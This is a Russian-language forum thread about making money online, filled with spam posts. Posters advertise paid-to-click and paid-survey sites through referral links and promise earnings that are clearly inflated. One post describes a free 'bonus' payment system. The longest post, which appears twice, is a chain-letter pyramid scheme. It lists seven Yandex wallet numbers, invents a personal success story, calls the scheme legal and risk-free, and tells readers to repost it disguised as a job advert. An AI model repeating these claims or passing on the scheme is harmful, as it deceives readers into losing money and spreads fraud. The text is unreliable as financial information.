Добро пожаловать на мой сайт!
Суббота, 27.04.2024, 13:34
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 5
  • 1
  • 2
  • 3
  • 4
  • 5
  • »
Форум » Прочее » Курилка » Как заработать в инете
Как заработать в инете
indigovan1Дата: Понедельник, 12.11.2007, 15:41 | Сообщение # 1
Admin
Группа: Администраторы
Сообщений: 29
Репутация: 6
Статус: Offline
surprised как кто знает?
book
 
Galiullin5Дата: Суббота, 20.09.2008, 19:58 | Сообщение # 2
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
1 СПОСОБ
Есть предложение заработать в инете БЕЗ ВЛОЖЕНИЙ. Времени потребуется не более 10 минут в день, заработать можно немного, но и делать особо ничего не нужно. 50-100 долларов в месяц вполне реально. трафик минимальный (не более 1Мб в день). Доход сначала небольшой, но он постоянно увеличивается! это не обман хотя бы потому что у них свой огромный форум, на котором всё расписано: http://bux.to/ спросите, а за что нам платят? мы кликаем на ссылки... и получаем за это деньги. а этому сайту платят деньги другие сайты, размещающие свои ссылки (на которые мы и кликаем). для этих сайтов есть вероятность, что мы ещё погуляем по их сайту... увеличим посещаемость. а соответственно им будут больше платить за рекламу на их сайте. в общем ВСЕ довольны Все делайте по шагам и вопросов у Вас никаких не возникнет, обязательно дочитайте до конца: 1) Зарегистрируйтесь в системе на сайте, http://bux.to/?r=Galiullin5 для этого в открывшемся справа вверху страницы нажмите [Register] 2) Далее заполняйте формы 1. Username - здесь пишите имя латинскими буквами для входа в систему (логин). 2. Password - здесь пишите пароль не менее 6 символов. 3. Confirm password - повторяете пароль. 4. Email Address - здесь пишите Ваш настоящий email адрес. На него ничего приходить не будет, кроме уведомлений от сайта. 5. Confirm Email Address - повторяете email. 6. PayPal email address for payments - здесь опять пишите этот же адрес. 7. Your country - выбираете страну проживания. 8. Referrer - тут должно быть написано Galiullin5 9. Ставите галочку, что Вы согласны с правилами сайта и вводите знаки с картинки. 10. Нажимаете на кнопку регистрации. 3) Далее нажимайте на надпись Login 4) Теперь вводите ваш логин и пароль, которые вы 2 шага назад зарегистрировали 5) Далее раздел Surf Ads 6) В этом разделе показаны все Ваши ссылки, которые есть у вас на сегодняшний день, они выделены серым цветом 7) Далее кликайте на любую возможную ссылку 8) В открывшемся окне сверху слева пошел отсчет, Вы для быстроты загрузки страницы можете отключить картинки. Просто ждите пока отсчет 30 секунд закончится 9) Как только появилась надпись DONE и галочка можете закрывать страницу 10) Если появилась надпись Done, но без галочки, значит вам эту страницу не засчитали, значит вы делаете что то не правильно, тогда просто перейдите обратно в раздел Surf ads и нажмите на эту ссылку заново. 11) Как страницу вам засчитали, закрывайте окно и переходите обратно в раздел surf ads, и кликайте на следующую ссылку 12) Те ссылки которые вы покликали становятся зачеркнутыми, для проверки, зайдите в раздел surf ads и обновите страницу (если это необходимо) 13) Как только все ссылки станут зачеркнутыми ваша задача на этот день окончена, заходите на следующий день и ссылки появятся заново, только может в большем количестве, если вы будете кликать каждый день. Для того что бы проверить сколько на вашем балансе денег уже заработано зайдите в раздел My stats, Первые цифры малы, но потом будет намного больше! 14) Сумма может составлять 5-7 баксов в день и это не предел и не обман!! 15) Приглашайте людей в систему по своей ссылке (она находится вверху страницы статистики). Зарабатывайте и на их кликах тоже! 15) Как снять деньги: накапливаете 10$, выводите деньги в обменную систему AlertPay, а оттуда либо на свою карточку VISA classic (можно оформить в любом банке), либо почтовым переводом, либо на вебмани или на яндекс.деньги ВсЁ работает!!!Тоже сначало не верил-думал развод,пока не начал получать деньги!!!Это всё правда!!!И всё легально!!!Всё равно вы ничего не теряете!!!никаких взносов,никаких платежей!!!Лишь заработок!!!(не считая 1-2 мб потраченный в день).Я просто предлагаю вам попробывать-не понравится, не будете больше ничего делать… Так что пробуйте,Желаю успеха! Главное не останавливайтесь на достигнутом
2 СПОСОБ

ЗАРАБОТАЙ ЛЕГКО И БЫСТРО!!!

Заработать 27$ за 10 мин!

Пожалуйста,прочитайте все до конца.

$$$$$`$$$$$$ НЕ ТЕРЯЙ ВРЕМЕНИ!!! ПОЛУЧАЙ ДЕНЬГИ!$$$$$

Заработать 27$ за 10 мин! Не веришь? Реально! Займет всего 10 мин!

КАЖДЙ ДЕНЬ ТЫ ПРИ ДЕНЬГАХ!!! ГЛАВНОЕ ДЕЙСТВОВАТЬ!!!

Инсткукция:
Переходим по ссылке
http://www.AWSurveys.com/HomeMain.cfm?RefID=Galiullin5
1.Нажимаем Create A Free Account

UserName - имя пользователя
Password - пароль 7-15 знаков
First Name - имя
Last Name - Фамилия
Email Address - почтовый ящик

Далее вводим цифорки-буковки, нажимаем кнопку Create A Free Account
Ура! Мы зарегестрировались!

2.Далее видим таблицу, имеющюю такой вид:

The Following Surveys are Available:
Welcome Survey -- A $6.00 Website Evaluation is Available.
A $4.00 Website Evaluation is Available.
A $4.00 Website Evaluation is Available.
A $4.00 Website Evaluation is Available.
A $4.00 Website Evaluation is Available.
A $4.00 Website Evaluation is Available.
A February Bonus Website Evaluation is Available.

3.Щелкаем по одной из ссылок на этой странице, попадаем на следущюю
страницу ( тут нам радостно сообщают, что нам заплатят 6$ и это
займет всего 5-10 мин.) и там щелкаем по надписи "Start Survey Now"

4.тут 2 ссылки и 2 поля, в них надо написать отзыв о сайте на англ
языке.
Кто не силен пишу шаблон-пример:It is an excellent site, I shall
advise its all!

5.Щелкаем по кнопке внизу "Click to submit ..." Переместились на
страницу, на которой нам сообщают, что на наш баланс зачислено 6$.
Щелкаем по ссылке "Click Here to go Home and..."
6.и так далее по ссылочкам и так каждый день.

7.Для вывода денег воспользуйтель кнопкой "Redeem Money"

8. Для вывода денег нужно зарегистрироватся в системе AlertPay
Зайдите по ссылке http://www.alertpay.com/?VqKmKeab0%2bMhgeeds7VqJg%3d%3d
выберите свою страну,нажмите personal account,потом creat account и
заполните форму регистрации.
Минимум к выводу- 75 долларов .Если вы заинтересовались этим,
то пишите мне на all-shil@yandex.ru и я вам объясню, как на этом заработать больше денег
В теме письма напишите работа-27.
Чем мне нравится эта система, так это тем,
что она привязана к кредитной карточке. Кредитку можно оформить в
любом коммерческом банке. Либо через электронные обменные пункты на
Вебмани или на ЯндеХ!
Один день 27$ за 10 мин без проблем!)))Но для того чтобы появлялись новые
ссылки, вы должны набирать реферралов, как это делаю я. Оставляйте свои объяв-
ления на разных форумах о работе. Сохраните это мое объявление у себя на компьютере,
только вместо моей рефссылки впишите свою. Вашу ссылку для набора реферралов вы найдете
после регистрации на AWSurveys пройдя по моей ссылке
http://www.AWSurveys.com/HomeMain.cfm?RefID=Galiullin5 Удачи!

 
lohi1234567Дата: Среда, 08.04.2009, 22:35 | Сообщение # 3
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Я знаю ЗДЕСЬ можно неплохо заработать smile
 
kazvikДата: Вторник, 04.01.2011, 00:29 | Сообщение # 4
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
1WMR за клик, пока еще, сайт только развивается
http://strategy.joinwm.com/register.php?r=viklaz

3 ссылки в день 24 руб.
http://www.monelik.ru/index.php?ref=27567

В Интернете продвигается новая платежная система - PayBox.
Так как она только в развитии - регистрация БЕСПЛАТНАЯ, и на счет сразу ложится сумма в $25.Каждый день, если Вы посещаете сайт, добавляется еще $20.
Аналогичным образом запускались системы Yandex-деньги и деньги Mail.ru.
Таким образом компания привлекает людей, которые в будущем будут пользоваться их услугами,сегодня они дарят бонусы всем первым клиентам.
Акция не постоянная, спешите поучаствовать!
Никаких вложений от Вас не потребуется, просто переходите по этой ссылке и регистрируйтесь:
http://www.paybox.me/r/valrus
1. После открытия страницы справа нажмите на "Click Here to Join Now!" (выделено голубым цветом).
2. Придумайте и введите логин, эл. почту, пароль (2 раза), поставьте галочку слева от надписи "I agree to the Terms of Service", нажмите кнопку "Continue>>".
3. На новой странице введите ещё раз почту и нажмите кнопку "Subscribe".
4. В открывшемся новом окне введите строку с картинки и нажмите кнопку "Subscribe".
5. Закройте окно, зайдите на указанный Вами е-мейл и активируйтесь по ссылке.
Все готово! 25$ уже начислено!
Теперь заходите в свой аккаунт каждый день 2-3 раза и Вам будет начисляться новые бонусы по 20$ за каждый день!Начиная с 2011 года запланирован запуск этой платежной системы и можно будет получить свои деньги или же потратить их на свои нужды.
Удачи!

Хостинг бесплатных изображений — свежий взгляд!
http://screendepo.com/?partner=306

 
mishaДата: Понедельник, 04.04.2011, 22:36 | Сообщение # 5
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Я предлагаю Вам вещь, реально заработай
Я предлагаю Вам вещь‚ к которой и сама относилась поначалу скептически.
Но в отличие от многих подобных предложений - ЭТО ДЕЙСТВИТЕЛЬНО РАБОТАЕТ!!
Наткнулся я на это совершенно случайно‚ когда искал работу для
дополнительного заработка. Найдя статью‚ в которой говорилось‚ что можно сделать СОТНИ ТЫСЯЧ рублей всего
за ПАРУ НЕДЕЛЬ при вложении всего 70 руб.‚ я подумал‚ что это должно быть очередная фишка для лохов‚ но
решил всё-таки дочитать до конца и узнать‚ что мне предлагают: там говорилось‚ что надо послать по 10руб.
на 7 Internet-кошельков‚ которые ниже перечислены. Потом вычеркнуть первый кошелёк из списка‚ тем самым‚
сместив список на одну строчку вверх‚ в результате чего седьмая строчка освобождается‚ куда Вы вписываете
номер своего Internet-кошелька. Затем Вы закидываете данное сообщение‚ но уже с ВАШИМИ ДАННЫМИ на седьмой
строчке‚ на 200 разных форумов. Никаких уловок. Ну‚ я поразмышлял и подумал ‚ что‚ в принципе‚ ничего не
теряю‚ кроме 70 руб.‚ и решила попробовать. Установил Internet-кошелёк‚ перечислил всем участникам акции
по 10 руб. и начал рассылать эти объявления по разным форумам и доскам объявлений. В течение 3-х дней я
зарегистрировался более чем в 100 бизнес - форумах и бесплатных досках объявлений. Прошла неделя‚ заглядываю
в свой Internet-кошелёк и‚ угадайте что!!! Поступлений никаких нет‚ вообще. А разные участники пишут‚ что за
неделю заработали кто по 750 руб.‚ кто по 450 руб.. Пиши-пропало‚ подумала я‚ попал в очередной лохотрон‚
желая заработать за пару недель десятки тысяч рублей. Ну и бросила это занятие‚ так и не дослав своё
объявление до 200 форумов‚ 70 рублей убытка не ударило по моему бюджету. Ещё через неделю заглянул в свой
Internet-кошелёк‚ смотрю‚ всего одно поступление 10 руб.. Да‚ думаю‚ дело не стоящее‚ случайно нашёлся такой
же наивный‚ как и я... Ещё через две недели я всё-таки снова открыл свой Internet-кошелёк‚ а в нём уже около
1300 руб. Откуда? Непонятная картина‚ но всё равно 1300 руб. на дороге не валяются‚ хоть это и мало‚ как
пишут предыдущие участники они за 1 месяц заработали десятки тысяч долларов. И вдруг после одного месяца
началось самое интересное: на мой кошелёк стали приходить деньги КАЖДЫЙ ДЕНЬ‚ спустя ещё 2 недели на моём
счету уже было около 39 000 руб.. После этого я отправил свои объявления ещё более чем на 150 форумов.
Результат был ошеломляющий! По прошествии всего 2 месяцев я получил 157 000 руб.. И деньги идут каждый
день‚ каждые 10 минут на мой счёт поступает по 10-30 руб. Я был в очень плохом экономическом положении и
долго не могла найти себе подходящую работу до того‚ как наткнулся на эту статью. Я не поверил ‚ что это
работает‚ пока не начал получать переводы со всего света. Моя работа теперь - это каждый день по несколько
часов в Интернете и ВСЁ!!! А заработок такой‚ что никаким начальникам и руководителям даже не снился!!!
Теперь я расскажу Вам как это работает и почему! Я Вам обещаю‚ что если Вы будете в точности соблюдать ниже
перечисленные инструкции‚ то вы начнёте получать намного больше денег‚ чем думаете‚ не прилагая к этому
особых усилий. Согласитесь‚ что это просто и совершенно легально!!! Ваш вклад всего 70 рублей и очень высокие
шансы увеличить своё благосостояние!
ВАЖНО: это не обман и при этом Вы ничем не рискуете‚ но это РАБОТАЕТ! БЛАГОПОЛУЧИЕ ЛЮБОГО УЧАСТНИКА ПРОЕКТА
ЗАВИСИТ ОТ БЛАГОПОЛУЧИЯ КАЖДОГО ЕГО УЧАСТНИКА.
ВНИМАНИЕ!!! Прочтите это пару раз. Следуйте инструкциям в ТОЧНОСТИ и Вы неплохо заработаете в течение двух
месяцев!!! Всё это удачно работает благодаря ЧЕСТНОСТИ участников. ВОТ ТЕ САМЫЕ 3 ШАГА К УСПЕХУ:
1. Зарегистрируйтесь в системе Яндекс.Деньги. Это можно сделать тут www.money.yandex.ru (извините за выражение)‚ хорошенько ознакомьтесь с данной системой‚ как она
работает‚ выберите оптимальный для себя вариант пополнения кошелька и внесите 70 рублей на свой кошелёк.
Сразу возникает проблема внесения денег на счёт‚ скорее всего‚ придётся прогуляться в ближайший банк‚ лично
я пополнила через терминал оплаты сотовой связи‚ но поверьте один раз сходить для последующего реального
заработка стоит! Вообще всё на сайте расписано и понятно. Возьмите первый номер кошелька из нижеуказанного
списка‚ отправьте на него 10 руб.‚ вписав этот номер в поле «Номер счёта»; всё‚ что Вы сделали - это создали
услугу‚ и самое главное - абсолютно легально. Вы просите законный сервис‚ за который платите. Далее‚ начиная
со второго‚ по аналогии отправьте по 10 руб. на следующие 6 кошельков. И ещё номер кошельков вводите
внимательно‚ не допустите ошибки. ОБЯЗАТЕЛЬНО вписывайте в поле Контракт/назначение платежа: Пожалуйста‚
внесите меня в список Яndex кошельков
P.S. Советую вводить номер кошелька вручную!!!
1) 41001944459121
2) 41001912526803
3) 41001912533199
4) 41001912546731
5) 41001944494123
6) 41001912553652
7) 41001944500067
ПОВТОРЯЮ‚ ЧТОБЫ ПОЛУЧАТЬ ДОХОДЫ‚ НЕОБХОДИМО ОТПРАВИТЬ НА КАЖДЫЙ ИЗ ЭТИХ 7 КОШЕЛЬКОВ ПО 10 РУБЛЕЙ‚ ИНАЧЕ
СЕТЕВЫМИ МОДЕРАТОРАМИ (АДМИНИСТРАТОРАМИ) YANDEX КОШЕЛЬКОВ ВЫ ПРОСТО НЕ БУДЕТЕ ВКЛЮЧЕНЫ В ПРОЕКТ И НЕ СМОЖЕТЕ
ОБНАЛИЧИТЬ ДОХОДЫ.
Теперь ВНИМАНИЕ!!! После того‚ как Вы выполнили шаг 1‚ ШАГ 2: напишите своё подобное письмо‚ можете
скопировать моё (можно в формате txt или как Вам удобней). В скопированной статье вычеркните из списка
кошельков ПЕРВЫЙ (ВЕРХНИЙ) кошелёк и переместите 2-ой кошелёк на место 1-ого‚ который Вы стёрли‚ 3-ий на
место 2-ого‚ четвёртый на место 3-его‚ 5-ый на место 4-ого‚ 6-ой на место 5-ого‚ 7-ой на место 6-ого‚
а в 7-ой номер‚ который оказался пустым‚ впишите номер ВАШЕГО кошелька!!!
3. Разместите эту статью на не менее‚ чем 200-300 форумах и новостных лентах (News Groups). Запомните‚ чем
больше Вы разместите‚ тем выше будет Ваш доход‚ и этот доход будет напрямую зависеть от Вас. Когда будете
размещать статью‚ то не пишите «Заработать легко миллион»‚ «Большие деньги за месяц» и т. п.‚ лучше
написать «Требуется менеджер‚ з/п 1000 $». Размещение этой статьи на 200 форумах‚ даже на самых
малопосещаемых‚ гарантирует Вам доход 180 000 руб. - ЭТО МИНИМУМ!!! Всего за 2 месяца!!! Больше
размещений - больше доход (при том в геометрической прогрессии). ПОМНИТЕ!!! Этот бизнес продолжает
существовать и процветать только благодаря ЧЕСТНОСТИ И СЕРЪЁЗНОСТИ УЧАСТНИКОВ. Итак‚ когда Вы достигнете
первой позиции‚ Вы будете иметь тысячи долларов просто КАК СОЗДАТЕЛЬ СПИСКА!!! Это стоит всего 70 рублей
и совсем нетрудной работы!!! Главное - это РАБОТАЕТ!!! Делайте это сейчас‚ не откладывая на завтра‚ время
- деньги!!! Но поработать всё же придётся. Необходимо заинтересовать людей. Для этого необходимо
воспользоваться рассылкой. Размещением объявлений на специализированных сайтах о поисках работы‚ форумах‚
досках объявлений. А тут всё в ВАШИХ руках‚ ДЕРЗАЙТЕ!!! Ведь ничего‚ кроме 70 рублей вы не теряете!!!
А если вдруг не получится‚ а если этот бизнес рухнет‚ и никто мне денег не пришлёт? - ЭТО СТРОКА ДЛЯ
ПЕССИМИСТОВ. Ну и что!!! Каждый день в Интернете появляются от 20000 до 50000 новых пользователей. По
прогнозам специалистов только в России к 2008 году количество пользователей Интернета увеличится с нынешних
9 млн. пользователей до 21 млн.!!! Ну‚ и последнее‚ это действительно великая аксиома - чтобы получить
что-то‚ надо дать что-то‚ а чтобы получить ещё больше‚ надо дать ещё больше! Убедитесь в этом сами...
Удачи Вам!!А теперь я Вам объясню‚ почему Вы в любом случае ничего не теряете‚ а ТОЛЬКО ВЫИГРЫВАЕ
ТЕ!!! Скажем‚ из 200 размещений я получу только 5 ответов (очень низкая цифра)‚ значит‚ я сделаю 50 рублей‚
находясь на 7 позиции в списке. Теперь эти 5 людей делают опять же МИНИМУМ 200 размещений с моим кошельком
на 6-ой позиции‚ и только 5 людей отвечают тем первым 5 - это уже 250 рублей. Дальше эти 25 людей делают по
200 размещений с моим кошельком на 5 строчке и только 5 отвечают - мой доход 1 250 рублей. Теперь эти 125
людей‚ разместив и получив только по 5 ответов‚ дают мне 6 250 рублей прибыли (я на 4 позиции). Дальше
смешнее: эти 625 людей делают по минимум 200 размещений со мной на 3 строчке и только 5 людей отвечают -
это 31250 рублей. Самое интересное это то‚ что эти 3 125 людей сделают ещё по 200 размещений‚ ну а если
им ответят только 5 людей‚ то я уже получаю 156 250 рублей (я на 2-ой позиции). Теперь ВНИМАНИЕ: эти 15 625
людей сделают ещё по 200 размещений‚ им отвечают 5 человек - это 781 250 рублей и так далее!!! Не правда ли
внушительные цифры? И это всё за первоначальный вклад в 70 рублей!!! Вы себе можете представить‚ что тысячи
людей со всего мира присоединяются к Интернету и читают эти статьи каждый день‚ так же как и Вы сейчас
читаете эту статью!!! Так что? Потратите ли Вы 70 рублей‚ чтобы узнать работает ли это??? И последнее‚ на
мой взгляд‚ самое главное: КАК СНИМАТЬ ДЕНЬГИ С ИНТЕРНЕТ-КОШЕЛЬКА? Нажимаешь «снять деньги»‚ далее выбираешь
подходящий банк твоего города‚ лучше выбирай банк‚ где не надо открывать счёт‚ набираешь далее данные
владельца программы ИНТЕРНЕТ-КОШЕЛЬКА‚ и набираешь данные‚ кто будет снимать деньги в банке (там требуются
паспортные данные‚ пишите правду‚ иначе не дадут денег).

Добавлено (04.04.2011, 22:36)
---------------------------------------------
Я предлагаю Вам вещь, реально заработай
Я предлагаю Вам вещь‚ к которой и сама относилась поначалу скептически.
Но в отличие от многих подобных предложений - ЭТО ДЕЙСТВИТЕЛЬНО РАБОТАЕТ!!
Наткнулся я на это совершенно случайно‚ когда искал работу для
дополнительного заработка. Найдя статью‚ в которой говорилось‚ что можно сделать СОТНИ ТЫСЯЧ рублей всего
за ПАРУ НЕДЕЛЬ при вложении всего 70 руб.‚ я подумал‚ что это должно быть очередная фишка для лохов‚ но
решил всё-таки дочитать до конца и узнать‚ что мне предлагают: там говорилось‚ что надо послать по 10руб.
на 7 Internet-кошельков‚ которые ниже перечислены. Потом вычеркнуть первый кошелёк из списка‚ тем самым‚
сместив список на одну строчку вверх‚ в результате чего седьмая строчка освобождается‚ куда Вы вписываете
номер своего Internet-кошелька. Затем Вы закидываете данное сообщение‚ но уже с ВАШИМИ ДАННЫМИ на седьмой
строчке‚ на 200 разных форумов. Никаких уловок. Ну‚ я поразмышлял и подумал ‚ что‚ в принципе‚ ничего не
теряю‚ кроме 70 руб.‚ и решила попробовать. Установил Internet-кошелёк‚ перечислил всем участникам акции
по 10 руб. и начал рассылать эти объявления по разным форумам и доскам объявлений. В течение 3-х дней я
зарегистрировался более чем в 100 бизнес - форумах и бесплатных досках объявлений. Прошла неделя‚ заглядываю
в свой Internet-кошелёк и‚ угадайте что!!! Поступлений никаких нет‚ вообще. А разные участники пишут‚ что за
неделю заработали кто по 750 руб.‚ кто по 450 руб.. Пиши-пропало‚ подумала я‚ попал в очередной лохотрон‚
желая заработать за пару недель десятки тысяч рублей. Ну и бросила это занятие‚ так и не дослав своё
объявление до 200 форумов‚ 70 рублей убытка не ударило по моему бюджету. Ещё через неделю заглянул в свой
Internet-кошелёк‚ смотрю‚ всего одно поступление 10 руб.. Да‚ думаю‚ дело не стоящее‚ случайно нашёлся такой
же наивный‚ как и я... Ещё через две недели я всё-таки снова открыл свой Internet-кошелёк‚ а в нём уже около
1300 руб. Откуда? Непонятная картина‚ но всё равно 1300 руб. на дороге не валяются‚ хоть это и мало‚ как
пишут предыдущие участники они за 1 месяц заработали десятки тысяч долларов. И вдруг после одного месяца
началось самое интересное: на мой кошелёк стали приходить деньги КАЖДЫЙ ДЕНЬ‚ спустя ещё 2 недели на моём
счету уже было около 39 000 руб.. После этого я отправил свои объявления ещё более чем на 150 форумов.
Результат был ошеломляющий! По прошествии всего 2 месяцев я получил 157 000 руб.. И деньги идут каждый
день‚ каждые 10 минут на мой счёт поступает по 10-30 руб. Я был в очень плохом экономическом положении и
долго не могла найти себе подходящую работу до того‚ как наткнулся на эту статью. Я не поверил ‚ что это
работает‚ пока не начал получать переводы со всего света. Моя работа теперь - это каждый день по несколько
часов в Интернете и ВСЁ!!! А заработок такой‚ что никаким начальникам и руководителям даже не снился!!!
Теперь я расскажу Вам как это работает и почему! Я Вам обещаю‚ что если Вы будете в точности соблюдать ниже
перечисленные инструкции‚ то вы начнёте получать намного больше денег‚ чем думаете‚ не прилагая к этому
особых усилий. Согласитесь‚ что это просто и совершенно легально!!! Ваш вклад всего 70 рублей и очень высокие
шансы увеличить своё благосостояние!
ВАЖНО: это не обман и при этом Вы ничем не рискуете‚ но это РАБОТАЕТ! БЛАГОПОЛУЧИЕ ЛЮБОГО УЧАСТНИКА ПРОЕКТА
ЗАВИСИТ ОТ БЛАГОПОЛУЧИЯ КАЖДОГО ЕГО УЧАСТНИКА.
ВНИМАНИЕ!!! Прочтите это пару раз. Следуйте инструкциям в ТОЧНОСТИ и Вы неплохо заработаете в течение двух
месяцев!!! Всё это удачно работает благодаря ЧЕСТНОСТИ участников. ВОТ ТЕ САМЫЕ 3 ШАГА К УСПЕХУ:
1. Зарегистрируйтесь в системе Яндекс.Деньги. Это можно сделать тут www.money.yandex.ru (извините за выражение)‚ хорошенько ознакомьтесь с данной системой‚ как она
работает‚ выберите оптимальный для себя вариант пополнения кошелька и внесите 70 рублей на свой кошелёк.
Сразу возникает проблема внесения денег на счёт‚ скорее всего‚ придётся прогуляться в ближайший банк‚ лично
я пополнила через терминал оплаты сотовой связи‚ но поверьте один раз сходить для последующего реального
заработка стоит! Вообще всё на сайте расписано и понятно. Возьмите первый номер кошелька из нижеуказанного
списка‚ отправьте на него 10 руб.‚ вписав этот номер в поле «Номер счёта»; всё‚ что Вы сделали - это создали
услугу‚ и самое главное - абсолютно легально. Вы просите законный сервис‚ за который платите. Далее‚ начиная
со второго‚ по аналогии отправьте по 10 руб. на следующие 6 кошельков. И ещё номер кошельков вводите
внимательно‚ не допустите ошибки. ОБЯЗАТЕЛЬНО вписывайте в поле Контракт/назначение платежа: Пожалуйста‚
внесите меня в список Яndex кошельков
P.S. Советую вводить номер кошелька вручную!!!
1) 41001944459121
2) 41001912526803
3) 41001912533199
4) 41001912546731
5) 41001944494123
6) 41001912553652
7) 41001944500067
ПОВТОРЯЮ‚ ЧТОБЫ ПОЛУЧАТЬ ДОХОДЫ‚ НЕОБХОДИМО ОТПРАВИТЬ НА КАЖДЫЙ ИЗ ЭТИХ 7 КОШЕЛЬКОВ ПО 10 РУБЛЕЙ‚ ИНАЧЕ
СЕТЕВЫМИ МОДЕРАТОРАМИ (АДМИНИСТРАТОРАМИ) YANDEX КОШЕЛЬКОВ ВЫ ПРОСТО НЕ БУДЕТЕ ВКЛЮЧЕНЫ В ПРОЕКТ И НЕ СМОЖЕТЕ
ОБНАЛИЧИТЬ ДОХОДЫ.
Теперь ВНИМАНИЕ!!! После того‚ как Вы выполнили шаг 1‚ ШАГ 2: напишите своё подобное письмо‚ можете
скопировать моё (можно в формате txt или как Вам удобней). В скопированной статье вычеркните из списка
кошельков ПЕРВЫЙ (ВЕРХНИЙ) кошелёк и переместите 2-ой кошелёк на место 1-ого‚ который Вы стёрли‚ 3-ий на
место 2-ого‚ четвёртый на место 3-его‚ 5-ый на место 4-ого‚ 6-ой на место 5-ого‚ 7-ой на место 6-ого‚
а в 7-ой номер‚ который оказался пустым‚ впишите номер ВАШЕГО кошелька!!!
3. Разместите эту статью на не менее‚ чем 200-300 форумах и новостных лентах (News Groups). Запомните‚ чем
больше Вы разместите‚ тем выше будет Ваш доход‚ и этот доход будет напрямую зависеть от Вас. Когда будете
размещать статью‚ то не пишите «Заработать легко миллион»‚ «Большие деньги за месяц» и т. п.‚ лучше
написать «Требуется менеджер‚ з/п 1000 $». Размещение этой статьи на 200 форумах‚ даже на самых
малопосещаемых‚ гарантирует Вам доход 180 000 руб. - ЭТО МИНИМУМ!!! Всего за 2 месяца!!! Больше
размещений - больше доход (при том в геометрической прогрессии). ПОМНИТЕ!!! Этот бизнес продолжает
существовать и процветать только благодаря ЧЕСТНОСТИ И СЕРЪЁЗНОСТИ УЧАСТНИКОВ. Итак‚ когда Вы достигнете
первой позиции‚ Вы будете иметь тысячи долларов просто КАК СОЗДАТЕЛЬ СПИСКА!!! Это стоит всего 70 рублей
и совсем нетрудной работы!!! Главное - это РАБОТАЕТ!!! Делайте это сейчас‚ не откладывая на завтра‚ время
- деньги!!! Но поработать всё же придётся. Необходимо заинтересовать людей. Для этого необходимо
воспользоваться рассылкой. Размещением объявлений на специализированных сайтах о поисках работы‚ форумах‚
досках объявлений. А тут всё в ВАШИХ руках‚ ДЕРЗАЙТЕ!!! Ведь ничего‚ кроме 70 рублей вы не теряете!!!
А если вдруг не получится‚ а если этот бизнес рухнет‚ и никто мне денег не пришлёт? - ЭТО СТРОКА ДЛЯ
ПЕССИМИСТОВ. Ну и что!!! Каждый день в Интернете появляются от 20000 до 50000 новых пользователей. По
прогнозам специалистов только в России к 2008 году количество пользователей Интернета увеличится с нынешних
9 млн. пользователей до 21 млн.!!! Ну‚ и последнее‚ это действительно великая аксиома - чтобы получить
что-то‚ надо дать что-то‚ а чтобы получить ещё больше‚ надо дать ещё больше! Убедитесь в этом сами...
Удачи Вам!!А теперь я Вам объясню‚ почему Вы в любом случае ничего не теряете‚ а ТОЛЬКО ВЫИГРЫВАЕ
ТЕ!!! Скажем‚ из 200 размещений я получу только 5 ответов (очень низкая цифра)‚ значит‚ я сделаю 50 рублей‚
находясь на 7 позиции в списке. Теперь эти 5 людей делают опять же МИНИМУМ 200 размещений с моим кошельком
на 6-ой позиции‚ и только 5 людей отвечают тем первым 5 - это уже 250 рублей. Дальше эти 25 людей делают по
200 размещений с моим кошельком на 5 строчке и только 5 отвечают - мой доход 1 250 рублей. Теперь эти 125
людей‚ разместив и получив только по 5 ответов‚ дают мне 6 250 рублей прибыли (я на 4 позиции). Дальше
смешнее: эти 625 людей делают по минимум 200 размещений со мной на 3 строчке и только 5 людей отвечают -
это 31250 рублей. Самое интересное это то‚ что эти 3 125 людей сделают ещё по 200 размещений‚ ну а если
им ответят только 5 людей‚ то я уже получаю 156 250 рублей (я на 2-ой позиции). Теперь ВНИМАНИЕ: эти 15 625
людей сделают ещё по 200 размещений‚ им отвечают 5 человек - это 781 250 рублей и так далее!!! Не правда ли
внушительные цифры? И это всё за первоначальный вклад в 70 рублей!!! Вы себе можете представить‚ что тысячи
людей со всего мира присоединяются к Интернету и читают эти статьи каждый день‚ так же как и Вы сейчас
читаете эту статью!!! Так что? Потратите ли Вы 70 рублей‚ чтобы узнать работает ли это??? И последнее‚ на
мой взгляд‚ самое главное: КАК СНИМАТЬ ДЕНЬГИ С ИНТЕРНЕТ-КОШЕЛЬКА? Нажимаешь «снять деньги»‚ далее выбираешь
подходящий банк твоего города‚ лучше выбирай банк‚ где не надо открывать счёт‚ набираешь далее данные
владельца программы ИНТЕРНЕТ-КОШЕЛЬКА‚ и набираешь данные‚ кто будет снимать деньги в банке (там требуются
паспортные данные‚ пишите правду‚ иначе не дадут денег).

 
1221Дата: Четверг, 14.04.2011, 08:24 | Сообщение # 6
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
ы получите при регистрации 6$ и в первый же день заработайте 27$. А
потом в течение месяца получаете деньги ежедневно за участие в
опросах. Одна анкета от 4$ до 6$. ЭТО РЕАЛЬНО И ЛЕГАЛЬНО.

Чтобы начать работать необходимо:

1.Переходите по ссылке:http://www.AWSurveys.com/HomeMain.cfm?RefID=Subziro

$6.00 Welcome Survey After Free Registration!

2. Нажимаете Create A Free Account и регистрируетесь.

UserName - Имя пользователя
Password - Пароль 7-15 знаков
First Name - Имя
Last Name - Фамилия
Email Address - почтовый ящик
Далее вводим изображенное на картинке (цифры, буквы), нажимаем кнопку
Create A Free Account
Первый шаг сделан. Вас зарегистрировались.

3. Далее Вы видите таблицу, которая имеет такой вид

The Following Surveys are Available:
Welcome Survey -- A $6.00 Website Evaluation is Availabl

A $4.00 Website Evaluation is Available.
A $4.00 Website Evaluation is Available.
A $4.00 Website Evaluation is Available.
A $4.00 Website Evaluation is Available.
A $4.00 Website Evaluation is Available.

4..Щелкаете по одной из ссылок на этой странице, попадаете на
следующую страницу тут Вам сообщают, что Вам заплатят 6$ и это
займет всего 5-10 мин. И там щелкаете по надписи 'Start Survey Now'

5.Тут 2 ссылки и 2 поля, в них надо написать отзыв о сайте на английском языке.
Кто не силен в английском пишу несколько шаблонов-примеров:

It is an excellent site, I shall advise its all!
The site is fine!
It is an excellent site
This web a site is perfectly executed!
All is simple supper!
It was pleasant to me! The site is wonderful!
I shall advise its all!
I shall necessarily inform friends!
I SHOULD be informed all my friends all wonderfully!
It is necessary to tell to friends!
